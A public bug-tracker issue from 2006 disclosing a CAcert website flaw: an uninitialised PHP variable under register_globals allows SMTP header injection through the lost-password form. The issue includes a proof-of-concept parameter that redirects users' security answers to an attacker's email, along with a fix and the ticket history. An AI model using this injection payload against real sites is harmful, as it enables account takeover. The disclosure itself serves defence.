View Issue Details
| ID | Project | Category | View Status | Date Submitted | Last Update |
|---|---|---|---|---|---|
| 0000143 | Main CAcert Website | logged out | public | 2006-03-04 08:44 | 2013-11-20 22:23 |
| Reporter | aanriot | Assigned To | Sourcerer | ||
| Priority | immediate | Severity | crash | Reproducibility | always |
| Status | closed | Resolution | fixed | ||
| Fixed in Version | 2007 | ||||
| Summary | 0000143: nobody is perfekt | ||||
| Description | I found yet another bug on the CAcert.org website that allows anyone to take over other users CAcert accounts. The only thing that is needed is the accountname and the users date of birth. Details ======= In index.php below line 39 a variable $body is used to compile a body for an email, which is send to support@cacert.org. This variable is not initialized before its first use in line 51 $body .= "System: "... As the website is using php register_globals any POST/GET parameter named body can initialize body. This can be used to steal the correct answers to the lost password questions and to set a new passwort using these answers ... Proof of Concept ================ 1. Open Lost-Password screen 2. Insert a loginname and date of birth 3. copy source of the result page and modify the action parameter of the from tag adding ?body=%0d%0a.%0d%0a MAIL%20FROM:test%0d%0a RCPT%20TO:YOUR-EMAIL-ADDRESS%0d%0a DATA%0d%0a%0d%0a 4. Check your email and read the answers of the lost password questions Solution ======== Setting body=""; should solve this issue. Additionally support@cacert.org should check for any incomplete Lost-Password (Missing Questions/Answers and missing bottom line) emails to find out if this bug has yet been abused by anyone ... Have fun, Chris | ||||
| Tags | No tags attached. | ||||
| Reviewed by | |||||
| Test Instructions | |||||
| Date Modified | Username | Field | Change |
|---|---|---|---|
| 2006-03-04 08:44 |
|
New Issue | |
| 2006-03-04 09:14 | homer | Assigned To | => duane |
| 2006-03-04 09:14 | homer | Status | new => confirmed |
| 2006-03-04 09:20 | homer | Priority | normal => immediate |
| 2006-03-04 09:20 | homer | Projection | none => minor fix |
| 2006-03-04 09:20 | homer | ETA | none => < 1 day |
| 2006-03-04 10:41 | duane | Status | confirmed => closed |
| 2006-03-04 10:41 | duane | Resolution | open => fixed |
| 2006-03-06 03:40 | homer | Status | closed => needs work |
| 2006-03-06 03:40 | homer | Assigned To | duane => homer |
| 2007-10-24 05:36 | evaldo | Note Added: 0000903 | |
| 2007-10-24 05:36 | evaldo | Reporter | bluec => aanriot |
| 2007-10-24 05:36 | evaldo | Assigned To | homer => Sourcerer |
| 2007-10-24 05:36 | evaldo | Severity | major => crash |
| 2007-11-04 01:16 | Sourcerer | Status | needs work => solved? |
| 2007-11-04 01:16 | Sourcerer | Fixed in Version | => production |
| 2007-11-04 01:16 | Sourcerer | Note Added: 0000937 | |
| 2009-04-09 21:00 | Sourcerer | Status | solved? => closed |
| 2013-01-13 16:57 | Werner Dworak | Fixed in Version | => 2007 |
| 2013-11-20 22:23 | NEOatNHNG | View Status | private => public |
